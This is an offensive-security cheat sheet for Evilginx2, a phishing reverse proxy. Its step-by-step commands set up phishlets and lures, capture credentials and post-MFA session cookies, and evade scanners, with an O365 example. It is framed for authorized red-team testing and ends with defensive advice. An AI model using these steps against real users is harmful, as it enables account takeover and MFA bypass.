EVILGINX2
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
Evilginx2 is a man-in-the-middle reverse-proxy framework used in AUTHORIZED red-team / phishing-resistance assessments. It proxies a real login page and captures credentials and SESSION TOKENS/cookies, demonstrating why legacy MFA can be bypassed. Use only under signed authorization and awareness-program rules of engagement.
CONCEPT#
# Victim -> evilginx (reverse proxy) -> real site # Captures username, password, AND the post-MFA session cookie # The stolen session cookie can bypass MFA (the tested weakness) # Phishing-resistant MFA (FIDO2/WebAuthn, token binding) defeats this - # which is the core lesson these engagements deliver
CORE CONCEPTS#
# phishlet - YAML config mimicking a target site (proxy rules) # lure - a generated phishing URL tied to a phishlet # session - captured tokens/creds for a caught victim
SERVER / DNS SETUP#
evilginx # Start (interactive) > config domain <yourdomain.com> # Base domain (you own it) > config ipv4 <server-ip> # Public IP # Point DNS A / wildcard records for the domain at the server first
PHISHLETS#
> phishlets # List available phishlets > phishlets hostname <name> login.yourdomain.com # Set the hostname > phishlets enable <name> # Enable (fetches TLS cert) > phishlets disable <name> > phishlets get-hosts <name> # DNS records to create
LURES#
> lures # List lures > lures create <phishlet> # Create a lure > lures get-url <id> # Get the phishing URL > lures edit <id> redirect_url https://real.site # Post-capture redirect > lures edit <id> template <file> # Landing template > lures delete <id>
SESSIONS (CAPTURED DATA)#
> sessions # List caught sessions > sessions <id> # Show creds + cookies # Export the session cookie and import into a browser to demonstrate # the MFA-bypass impact in the report (do NOT access data beyond RoE)
CONFIG / OPSEC#
> config redirect_url https://www.corp.lu # Default redirect > blacklist <mode> # Block scanners/bots > config gophish ... # GoPhish integration # Blacklisting reduces exposure to crawlers during a live test window
EXAMPLES#
# Minimal setup: domain, IP, phishlet, lure evilginx > config domain phish-test.example > config ipv4 203.0.113.10 > phishlets hostname o365 login.phish-test.example > phishlets enable o365 > lures create o365 > lures get-url 0 # Review a captured session to evidence MFA-session bypass in the report > sessions > sessions 1
NOTES#
- STRICTLY authorized use: named scope, signed authorization, defined test window, and data-handling rules - this tool captures real creds - The deliverable is a LESSON: legacy OTP/push MFA is phishable; recommend FIDO2/WebAuthn phishing-resistant MFA + conditional access - Do not access or exfiltrate victim data beyond proving the session works; destroy captured creds/cookies at engagement close - Ties directly to your phishing-detection work (OpenClaw) and the ENTRA-ID / conditional-access review angle - Detection/defence: impossible-travel + new-device sign-in analytics, token-binding, and user-agent/geo anomalies (see SENTINEL-KQL.txt) - Pairs with GOPHISH (campaign delivery) and SOCIAL-ENGINEERING sheets